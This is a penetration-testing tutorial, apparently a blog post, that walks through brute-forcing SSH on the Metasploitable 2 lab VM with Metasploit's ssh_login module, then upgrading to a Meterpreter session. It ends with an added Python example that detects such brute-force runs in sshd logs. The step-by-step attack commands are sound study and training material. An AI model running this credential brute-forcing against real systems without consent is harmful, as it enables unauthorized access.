Penetration Testing Series: Hacking Metasploitable 2 By Exploiting SSH Port 22

Introduction
This article continues my penetration testing series, exploring hacking Metasploitable 2. In this project, we delve into penetration testing by exploring the process of exploiting SSH Port 22 on the renowned vulnerable virtual machine, Metasploitable 2.
By targeting Metasploitable 2’s vulnerable SSH service, we aim to provide an in-depth understanding of the techniques employed by ethical hackers and penetration testers to exploit and gain unauthorized access to systems.
SSH (Secure Shell) is a widely used network protocol for secure remote login and file transfer. It provides encrypted communication between a client and a server over a computer network. While SSH is a secure protocol, attackers can still target it if it is not correctly configured. This article will focus on exploiting Port 22, the default port SSH servers use for communication.
Throughout this exploration, we will utilize the Metasploit Framework to illustrate how to take advantage of the vulnerabilities in the SSH service on Metasploitable 2 by employing commonly available modules and payloads. With this approach, we can access the target system without authorization.
It is important to emphasize that this article’s intent is solely educational and aimed at empowering security professionals and enthusiasts with knowledge on how to identify and secure their systems against potential threats. Understanding the tactics used by malicious actors is critical in developing robust defense mechanisms and implementing effective security measures.
Disclaimer:
All information, techniques, and tools described in this write-up are for educational purposes only. Use anything in this write-up at your discretion; I cannot be held responsible for any damages caused to any systems or yourselves legally. Using all tools and techniques described in this write-up for attacking individuals or organizations without their prior consent is highly illegal. You must obey all applicable local, state, and federal laws. I assume and accept no liability and will not be responsible for any misuse or damage caused by using the information herein.
Lab Setup
- VirtualBox
- Kali Linux Virtual Machine (VM)
- Metasploitable 2 VM
Part 1: Reconnaissance
To begin, confirm the information about the target system. Follow these steps:
1. Use the ifconfig command to get the IP address of the Metasploitable 2 VM: 10.60.0.18.
ifconfig

2. To access the Nmap scan file from the previous article on https://readmedium.com/penetration-testing-series-hacking-metasploitable-2-via-exploiting-ftp-port-21-4d90718d0897, enter the command “cat META2.txt” in the terminal.
cat META2.txt
Our target system is running OpenSSH 4.7p1 Debian on port 22.

Part 2: Metasploit
Follow these steps to utilize Metasploit to gain access to the target system:
1. Type “msfconsole” to launch the Metasploit Framework command-line interface.
msfconsole

2. Use the “search” command followed by “ssh_login” to search the Metasploit Framework for entries related to SSH login.
search ssh_login
We received back two exploits.
3. Type “use 0” to select and use the first exploit.

4. Type “show options” to view the required parameters that need to be set for the exploit.
show options
5. Fill in the required parameters: set RHOSTS (Remote Hosts) to the IP address of the target system (10.60.0.18), USER_FILE to Users.txt, and PASS_FILE to Passwords.txt.
The wordlists, Users.txt and Passwords.txt, were generated in the previous article in the penetration testing series, at https://readmedium.com/penetration-testing-series-hacking-metasploitable-2-via-exploiting-ftp-port-21-4d90718d0897.
set RHOSTS 10.60.0.18
set USER_FILE Users.txt
set PASS_FILE Passwords.txt
6. Type “show options.”
7. We need to update the value of STOP_ON_SUCCESS from false to true so that once we successfully find a valid username and password, the brute force scanner stops.

8. Type the following “set” command to change the value of STOP_ON_SUCCESS from false to true.
set STOP_ON_SUCCESS true
9. Again, type “show options” to confirm that you correctly set the RHOSTS, USER_FILE, PASS_FILE, and STOP_ON_SUCCESS.

10. Type “exploit” to execute the exploitation and gain access to the Metasploitable 2 machine via SSH Port 22.
exploit
We successfully used brute force to obtain the username and password “msfadmin”; as a result, we could establish SSH session 2 to interact with the target.
11. Type “sessions” to view the active sessions.
sessions


12. We are going to use session 1 by typing the following command:
sessions -u 1
Meterpreter session 3 opened.

13. Type “sessions 3”.
sessions 3
14. Type the “sysinfo” and “ifconfig” commands to interact with the Metasploitable 2 machine.
sysinfo
ifconfig

We were able to hack Metasploitable 2 by exploiting SSH through Port 22.
To exit the meterpreter session and Metasploit, type the following commands:
exit
exit -y
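From the defender's side, the run above leaves a recognizable trace in the target's SSH authentication log: a burst of failed passwords from one address, then a single accepted login once STOP_ON_SUCCESS halts the scan. The following Python detection is an added example, not part of the original lab; the log lines, the source addresses 10.60.0.5 and 10.60.0.30, the user alice, and the threshold of 5 are constructed assumptions.

```python
import re
from collections import defaultdict

# Constructed sample lines in the usual sshd syslog format (not captured from the lab).
SAMPLE_LOG = """\
Jan 10 10:00:01 metasploitable sshd[4101]: Failed password for invalid user admin from 10.60.0.5 port 40112 ssh2
Jan 10 10:00:02 metasploitable sshd[4102]: Failed password for root from 10.60.0.5 port 40113 ssh2
Jan 10 10:00:03 metasploitable sshd[4103]: Failed password for root from 10.60.0.5 port 40114 ssh2
Jan 10 10:00:04 metasploitable sshd[4104]: Failed password for invalid user test from 10.60.0.5 port 40115 ssh2
Jan 10 10:00:05 metasploitable sshd[4105]: Failed password for msfadmin from 10.60.0.5 port 40116 ssh2
Jan 10 10:00:06 metasploitable sshd[4106]: Accepted password for msfadmin from 10.60.0.5 port 40117 ssh2
Jan 10 10:05:00 metasploitable sshd[4110]: Failed password for alice from 10.60.0.30 port 51000 ssh2
Jan 10 10:05:09 metasploitable sshd[4111]: Accepted password for alice from 10.60.0.30 port 51001 ssh2
"""

# Matches password results only; key-based logins are out of scope here.
LINE_RE = re.compile(
    r"sshd\[\d+\]: (?P<result>Failed|Accepted) password for "
    r"(?:invalid user )?(?P<user>\S+) from (?P<ip>\S+) port \d+"
)

def find_bruteforce(log_text, threshold=5):
    """Return one finding per source IP that reached `threshold` failed
    password attempts; `compromised` names the account if a success followed."""
    failures = defaultdict(int)
    users_tried = defaultdict(set)
    findings = {}
    for line in log_text.splitlines():
        m = LINE_RE.search(line)
        if not m:
            continue
        ip, user = m["ip"], m["user"]
        if m["result"] == "Failed":
            failures[ip] += 1
            users_tried[ip].add(user)
            if failures[ip] >= threshold:
                findings.setdefault(ip, {"compromised": None})
        elif ip in findings and findings[ip]["compromised"] is None:
            # A success after a burst of failures: the guessing run found a valid pair.
            findings[ip]["compromised"] = user
    return [
        {"ip": ip, "failures": failures[ip], "users_tried": sorted(users_tried[ip]), **f}
        for ip, f in findings.items()
    ]
```

On Debian-based systems such as the one reported in the Nmap output, sshd typically writes these lines to /var/log/auth.log. A single mistyped password followed by a success, like the 10.60.0.30 lines, stays below the threshold and is not reported.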
Conclusion
I appreciate you taking the time to read this article. Hopefully, the information presented has been helpful and valuable to you.
I aim to reach a wider audience and enlighten them about the potential risks of cyber-attacks, various types of penetration testing tools, and everything related to information technology.
If you would like to access more articles, please follow me.
Also, don’t hesitate to leave feedback or suggestions for future topics. Thanks again for your interest and support!